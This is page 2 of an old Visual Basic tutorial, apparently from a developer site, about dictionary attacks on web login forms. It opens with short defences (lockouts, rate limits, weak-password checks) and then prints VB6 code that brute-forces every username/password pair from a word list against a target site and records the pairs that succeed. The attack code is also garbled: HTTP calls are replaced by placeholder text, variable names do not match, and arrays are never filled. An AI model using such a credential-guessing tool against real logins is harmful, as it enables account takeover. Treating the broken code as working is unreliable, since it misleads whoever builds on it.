Home arrow Visual Basic arrow Page 2 - Extranet/Intranet Dictionary Cracker in VB
VISUAL BASIC

Extranet/Intranet Dictionary Cracker in VB


The only way to know how to secure your system is to know how hackers attack. In this article Matt teaches us about the dictionary attack and and helps us secure against it.

Author Info:
By: Matt Burnett
Poor Best
Rating: 5 stars5 stars5 stars5 stars5 stars / 20
January 15, 2003
TABLE OF CONTENTS:
  1. · Extranet/Intranet Dictionary Cracker in VB
  2. · Building the Cracker
  3. · Conclusion

print this article
SEARCH DEVARTICLES

TOOLS YOU CAN USE

advertisement
Extranet/Intranet Dictionary Cracker in VB - Building the Cracker
(Page 2 of 3 )

The important elements of conducting a dictionary attack are 1) sending multiple UID/PW combinations, 2) the rate of sending UID/PW combinations, and 3) the ‘Commonness’ of the UID/PW words. To defend against a dictionary attack, simply address any one of the elements above and the defending site will be significantly strengthened (disclaimer.h).

In each element below, the defending server is an MS IIS Server; however, the concept arguments can be applied to any server.
  1. To defend against multiple UID/PW combinations, use the Session variable to track 3 incorrect access attempts. On the next attempt within the Session automatically refuse access. In fact, even the correct UID/PW will be rejected in this scenario. When the Session times-out, the system resets and the user can again gain access with the correct UID/PW.
  2. The ‘rate’ of sending UID/PW addresses the number of attempts to login within a given period of time. After a user has failed 3 times, code the application to refuse login attempts for the next hour. The dictionary attack is dead as it would take ~ 6.8 YEARS to use the smallest 100 word library.
  3. ‘Common’ words: need I say more? To force users to use uncommon words or random characters, generate passwords for users. I don’t like that method, so I take new passwords and compared them against a word library. If the submitted PW is in the library then a different one is requested.
The VB6 code below is compiled into a simple .exe that takes parameters such as site address, UID and PW.

Using a coma delimited .txt file of common words, the program sets a matrix of possible UID/PW combinations and sends them to the site for verification. The remote server’s response is analyzed to determine if access was granted. When the program is finished, a MsgBox is displayed with the UID/PW that were granted access.

Public Function getDictionary(ByVal strURL As String,_
ByVal strMethod As String, ByVal strForm As String, _
ByVal strMatchNoEntry As String, ByVal UidLimitLen As Integer) As String
  Dim mHTTP As Object, aryDictionary() As String
  Dim fso As Object, TextStream As Object, S As String, ApplicationPath As String
  ApplicationPath = App.Path & "\"
  Set fso = CreateObject("Scripting.FileSystemObject")
  Set TextStream = fso.OpenTextFile(ApplicationPath & "wordlist.txt", 1)
  S = S & TextStream.ReadAll
  TextStream.Close
  DoEvents
  getDictionary = getDictionaryAccess(strForm, UidLimitLen, oHTTP, strMatchNoEntry, aryDictionary)
End Function

Private Function getDictionaryAccess(ByVal Params As String, ByVal iSections As Integer,_
ByRef mHTTP As Object, ByVal strMatchNoEntry As String,_
ByRef aryDictionary() As String) As String
  'Returns ";" delimited string of params
  'assumes two params of username and password, the exact name value are passed in
  'getDictionaryAccess = "uid=matt&pwd=1;uid=matt&pwd=2;10006=DTM&10007=1999"
  'this guy will go 1, 2 and 3 characters against the Dictionary, then Dictionary against Dictionary
  'the random attack does the 1 to 3 uid and pw matrix
  Dim aryParams As Variant, strTemp As String, aryTemp() As String
  Dim uid As Integer, pw As Integer, strResponse As String, strSomeAccessPoints As String
  iSections = iSections + 1 'iSecitons allows control of word lenght
  On Error Resume Next
  For uid = 0 To UBound(aryDictionary)
    For pw = 0 To UBound(aryDictionary)
      If (Len(aryDictionary(uid)) < iSections) And (Len(aryDictionary(pw)) < iSections) Then
      getDictionaryAccess = aryParams(0) & "=" & aryDictionary(uid) & "&" & _
        aryParams(1) & "=" & aryDictionary(pw)
      mHTTP engine method call
      Call IMWaiting(mHTTP)
      strResponse = mHTTP engine data retrieval
      Call IMWaiting(mHTTP)
      strResponse = Replace(strResponse, Chr(13), ";")
      If (strResponse <> "") Then
        If Not CBool(InStr(CStr(strResponse), CStr(strMatchNoEntry)) > 0) Then
          'strSomeAccessPoints has the params that GRANTED ACCESS
          strSomeAccessPoints = strSomeAccessPoints & aryDictionary(uid) & "," & aryDictionary(pw) & ";"
        End If
      End If
      strResponse = ""
      DoEvents
      End If
    Next
  Next
  On Error GoTo 0
  getDictionaryAccess = strSomeAccessPoints
End Function
blog comments powered by Disqus
VISUAL BASIC ARTICLES

- Developing an XML Web Service Using Visual S...
- Creating an HTML File List with VB
- Fun with Email: VB6, CDO, MAPI, and a Remote...
- Extranet/Intranet Dictionary Cracker in VB
- Finding Default App Icons With Visual Basic
- Registry Fever With Visual Basic
- Implementing An ADO Data Control With VB6
- Printing With Visual Basic
- MSMQ Part 1/2: Architecture and Simple Imple...
- Magnifying The Desktop With Visual Basic
- Sending Email With MAPI Components in Visual...
- Two Person Chat With The Winsock Control And...
- A Real-Time ActiveX News Control
- Accessing the Windows API in Visual Basic
Find More Visual Basic Tutorials

Dev Articles Forums 
 RSS  Articles
 RSS  Forums
 RSS  All Feeds
Weekly Newsletter
 
Developer Updates  
Free Website Content 
Contact Us 
Site Map 
Privacy Policy 
Support 



© 2003-2012 by Developer Shed. All rights reserved. DS Cluster 11 - Follow our Sitemap
Popular Web Development Topics
All Web Development Tutorials